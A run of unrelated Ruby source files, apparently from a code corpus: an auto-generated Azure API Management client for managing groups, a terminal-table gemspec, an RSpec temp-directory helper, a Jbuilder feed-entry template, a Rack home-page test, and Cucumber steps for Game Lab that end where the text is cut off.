path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'subscriptionId' => @client.subscription_id},
query_params: {'$filter' => filter,'$top' => top,'$skip' => skip,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupCollection.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Gets the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [GroupContract] operation results.
#
def get(resource_group_name, service_name, group_id, custom_headers:nil)
response = get_async(resource_group_name, service_name, group_id, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, service_name, group_id, custom_headers:nil)
get_async(resource_group_name, service_name, group_id, custom_headers:custom_headers).value!
end
#
# Gets the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, service_name, group_id, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupContract.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Creates or Updates a group.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupCreateParameters] Create parameters.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def create_or_update(resource_group_name, service_name, group_id, parameters, custom_headers:nil)
response = create_or_update_async(resource_group_name, service_name, group_id, parameters, custom_headers:custom_headers).value!
nil
end
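# Usage sketch (editorial addition; property names on GroupCreateParameters are assumed
# from the generated model, and the group id and names are illustrative; `groups` is
# built as in the earlier sketch):
#
#   params = Models::GroupCreateParameters.new
#   params.name        = 'Readers'
#   params.description = 'Read-only consumers of the API'
#   groups.create_or_update('my-resource-group', 'my-apim-service', 'readers', params)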
#
# Creates or Updates a group.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupCreateParameters] Create parameters.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def create_or_update_with_http_info(resource_group_name, service_name, group_id, parameters, custom_headers:nil)
create_or_update_async(resource_group_name, service_name, group_id, parameters, custom_headers:custom_headers).value!
end
#
# Creates or Updates a group.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupCreateParameters] Create parameters.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def create_or_update_async(resource_group_name, service_name, group_id, parameters, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupCreateParameters.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 201 || status_code == 204
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Updates the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupUpdateParameters] Update parameters.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ErrorBodyContract] operation results.
#
def update(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:nil)
response = update_async(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:custom_headers).value!
response.body unless response.nil?
end
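# Usage sketch (editorial addition; property names on GroupUpdateParameters are assumed
# from the generated model). Passing '*' as if_match requests an unconditional update,
# as described above:
#
#   changes = Models::GroupUpdateParameters.new
#   changes.description = 'Updated description'
#   groups.update('my-resource-group', 'my-apim-service', 'readers', changes, '*')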
#
# Updates the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupUpdateParameters] Update parameters.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def update_with_http_info(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:nil)
update_async(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:custom_headers).value!
end
#
# Updates the details of the group specified by its identifier.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param parameters [GroupUpdateParameters] Update parameters.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def update_async(resource_group_name, service_name, group_id, parameters, if_match, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, 'if_match is nil' if if_match.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['If-Match'] = if_match unless if_match.nil?
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:patch, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 204 || status_code == 405
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 405
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::ErrorBodyContract.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes specific group of the API Management service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ErrorBodyContract] operation results.
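    # @example Sketch of an unconditional delete (placeholder names; assumes
    #   `group_operations` is an instance of this operations class). Pass the ETag
    #   from a prior GET instead of '*' to guard against concurrent edits:
    #   group_operations.delete('my-resource-group', 'my-apim', 'partner-devs', '*')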
#
def delete(resource_group_name, service_name, group_id, if_match, custom_headers:nil)
response = delete_async(resource_group_name, service_name, group_id, if_match, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Deletes specific group of the API Management service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def delete_with_http_info(resource_group_name, service_name, group_id, if_match, custom_headers:nil)
delete_async(resource_group_name, service_name, group_id, if_match, custom_headers:custom_headers).value!
end
#
# Deletes specific group of the API Management service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param group_id [String] Group identifier. Must be unique in the current API
# Management service instance.
# @param if_match [String] ETag of the Group Entity. ETag should match the
# current entity state from the header response of the GET request or it should
# be * for unconditional update.
    # @param custom_headers [Hash{String => String}] A hash of custom headers that
    # will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def delete_async(resource_group_name, service_name, group_id, if_match, custom_headers:nil)
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, "'service_name' should satisfy the constraint - 'MaxLength': '50'" if !service_name.nil? && service_name.length > 50
fail ArgumentError, "'service_name' should satisfy the constraint - 'MinLength': '1'" if !service_name.nil? && service_name.length < 1
fail ArgumentError, "'service_name' should satisfy the constraint - 'Pattern': '^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'" if !service_name.nil? && service_name.match(Regexp.new('^^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$$')).nil?
fail ArgumentError, 'group_id is nil' if group_id.nil?
fail ArgumentError, "'group_id' should satisfy the constraint - 'MaxLength': '256'" if !group_id.nil? && group_id.length > 256
fail ArgumentError, "'group_id' should satisfy the constraint - 'MinLength': '1'" if !group_id.nil? && group_id.length < 1
fail ArgumentError, "'group_id' should satisfy the constraint - 'Pattern': '^[^*#&+:<>?]+$'" if !group_id.nil? && group_id.match(Regexp.new('^^[^*#&+:<>?]+$$')).nil?
fail ArgumentError, 'if_match is nil' if if_match.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['If-Match'] = if_match unless if_match.nil?
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/groups/{groupId}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'resourceGroupName' => resource_group_name,'serviceName' => service_name,'groupId' => group_id,'subscriptionId' => @client.subscription_id},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 204 || status_code == 405
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 405
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::ErrorBodyContract.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists a collection of groups defined within a service instance.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [GroupCollection] operation results.
#
def list_by_service_next(next_page_link, custom_headers:nil)
response = list_by_service_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists a collection of groups defined within a service instance.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_service_next_with_http_info(next_page_link, custom_headers:nil)
list_by_service_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Lists a collection of groups defined within a service instance.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
    # @param custom_headers [Hash{String => String}] A hash of custom headers that
    # will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_service_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::ApiManagement::Mgmt::V2016_10_10::Models::GroupCollection.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists a collection of groups defined within a service instance.
#
# @param resource_group_name [String] The name of the resource group.
# @param service_name [String] The name of the API Management service.
# @param filter [String] | Field | Supported operators | Supported
# functions |
# |-------------|------------------------|---------------------------------------------|
# | id | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | name | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | description | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
# endswith |
# | type | eq, ne | N/A
# |
# @param top [Integer] Number of records to return.
# @param skip [Integer] Number of records to skip.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
    # @return [GroupCollection] which provides lazy access to pages of the response.
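    # @example Sketch of lazy paging (placeholder names; assumes the usual `value`
    #   array and `name` accessor on the generated collection and contract models):
    #   groups = group_operations.list_by_service_as_lazy('my-resource-group', 'my-apim', top: 50)
    #   groups.value.each { |group| puts group.name } if groups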
#
def list_by_service_as_lazy(resource_group_name, service_name, filter:nil, top:nil, skip:nil, custom_headers:nil)
response = list_by_service_async(resource_group_name, service_name, filter:filter, top:top, skip:skip, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_service_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 52.53877 | 233 | 0.683173 |
791acc286127dca2fd5e29d6b61416aa71e2c8b5 | 1,609 | # -*- encoding: utf-8 -*-
# stub: terminal-table 2.0.0 ruby lib
Gem::Specification.new do |s|
s.name = "terminal-table".freeze
s.version = "2.0.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["TJ Holowaychuk".freeze, "Scott J. Goldman".freeze]
s.date = "2020-11-01"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/tj/terminal-table".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.2.32".freeze
s.summary = "Simple, feature rich ascii table generation library".freeze
s.installed_by_version = "3.2.32" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_development_dependency(%q<bundler>.freeze, ["~> 2"])
s.add_development_dependency(%q<rake>.freeze, ["~> 13.0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 3.0"])
s.add_development_dependency(%q<term-ansicolor>.freeze, [">= 0"])
s.add_development_dependency(%q<pry>.freeze, [">= 0"])
s.add_runtime_dependency(%q<unicode-display_width>.freeze, ["~> 1.1", ">= 1.1.1"])
else
s.add_dependency(%q<bundler>.freeze, ["~> 2"])
s.add_dependency(%q<rake>.freeze, ["~> 13.0"])
s.add_dependency(%q<rspec>.freeze, [">= 3.0"])
s.add_dependency(%q<term-ansicolor>.freeze, [">= 0"])
s.add_dependency(%q<pry>.freeze, [">= 0"])
s.add_dependency(%q<unicode-display_width>.freeze, ["~> 1.1", ">= 1.1.1"])
end
end
| 40.225 | 112 | 0.666874 |
ff9f4e36929e85460769fb32159918a0cc9e85df | 391 | shared_context :run_in_temp_directory do
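  # Usage sketch (hypothetical spec; the file name and expectation are illustrative):
  #
  #   RSpec.describe 'config loader' do
  #     include_context :run_in_temp_directory
  #     it 'reads the generated file' do
  #       path = write_to_file('config/settings.yml', "enabled: true\n")
  #       expect(File.read(path)).to include('enabled')
  #     end
  #   end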
  require 'tmpdir'
  require 'fileutils'
  around do |spec|
    current_dir = Dir.pwd
    Dir.mktmpdir do |path|
      begin
        Dir.chdir(path)
        spec.call
      ensure
        # Restore the original working directory even if the example raises
        Dir.chdir(current_dir)
      end
    end
  end
def write_to_file(path, content, mode: nil)
FileUtils.mkdir_p(File.dirname(path))
File.write(path, content)
File.chmod(mode.to_i, path) if mode
path
end
end
| 20.578947 | 45 | 0.672634 |
ff0470258955b329dd2559e07591fd3253303081 | 1,163 | present entry do |entry_presenter|
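  # Rough shape of the rendered JSON (keys come from this template; values are illustrative):
  #   { "id": 1, "feed_id": 2, "title": "...", "author": "...", "summary": "...",
  #     "content": "...", "url": "https://example.com/entry", "published": "2019-01-01T00:00:00.000000Z",
  #     "created_at": "...", "original": { ... }, "twitter_id": null, "twitter_thread_ids": null,
  #     "images": { "original_url": "...", "size_1": { "cdn_url": "...", "width": 640, "height": 480 } },
  #     "enclosure": { "enclosure_url": "...", "enclosure_type": "audio/mpeg", ... },
  #     "extracted_articles": [ ... ] }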
json.extract! entry, :id, :feed_id, :title, :author, :summary
json.content entry_presenter.api_content
json.url entry.fully_qualified_url
json.published entry.published.iso8601(6)
json.created_at entry.created_at.iso8601(6)
json.original entry.original
json.twitter_id entry.twitter_id
json.twitter_thread_ids entry.twitter_thread_ids
json.images do
if entry.processed_image?
json.original_url entry.image["original_url"]
json.size_1 do
json.cdn_url entry.processed_image
json.width entry.image["width"]
json.height entry.image["height"]
end
else
json.null!
end
end
json.enclosure do
if entry_presenter.has_enclosure?
json.enclosure_url entry_presenter.enclosure_url
json.enclosure_type entry.data["enclosure_type"]
json.enclosure_length entry.data["enclosure_length"]
json.itunes_duration entry.data["itunes_duration"]
json.itunes_image entry.data["itunes_image"]
else
json.null!
end
end
json.extracted_articles entry_presenter.extracted_articles do |article|
json.merge! article
end
end | 32.305556 | 73 | 0.736887 |
1879c4de8da61792e4f82639702c2bba435b50e1 | 548 | # frozen_string_literal: true
require File.expand_path '../test_helper.rb', __dir__
class HomePageTest < MiniTest::Test
include Rack::Test::Methods
def app
Inferno::App.new
end
def test_front_page_responds
get '/'
assert last_response.ok?
assert last_response.body.downcase.include? 'html'
end
def test_no_x_frame_options_header
get '/'
refute_includes last_response.headers.keys.map(&:downcase), 'x-frame-options'
end
def test_404_page
get '/asdfasdf'
assert last_response.not_found?
end
end
| 20.296296 | 81 | 0.728102 |
797589e12d629f213252aed9b59239ada9f5d498 | 3,696 | # Gamelab-specific cucumber step definitions
# Which stage of allthethings.script contains the gamelab levels; this way we
# only have to update in one place if this changes.
GAMELAB_ALLTHETHINGS_STAGE = 19
Given /^I start a new Game ?Lab project$/ do
steps <<-STEPS
And I am on "http://studio.code.org/projects/gamelab/new"
And I rotate to landscape
And I wait for the page to fully load
STEPS
end
Given /^I am on the (\d+)(?:st|nd|rd|th)? Game ?Lab test level$/ do |level_index|
steps <<-STEPS
And I am on "http://studio.code.org/s/allthethings/stage/#{GAMELAB_ALLTHETHINGS_STAGE}/puzzle/#{level_index}"
And I rotate to landscape
And I wait for the page to fully load
STEPS
end
When /^I (?:run the game|press run)$/ do
# Use a short wait to surface any errors that occur during the first few frames
steps <<-STEPS
And I press "runButton"
And I wait for 2 seconds
STEPS
end
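# A hypothetical feature-file scenario composed from steps defined in this file
# (the console assertion string is illustrative):
#
#   Scenario: Draw a ninja in a fresh Game Lab project
#     Given I start a new Game Lab project
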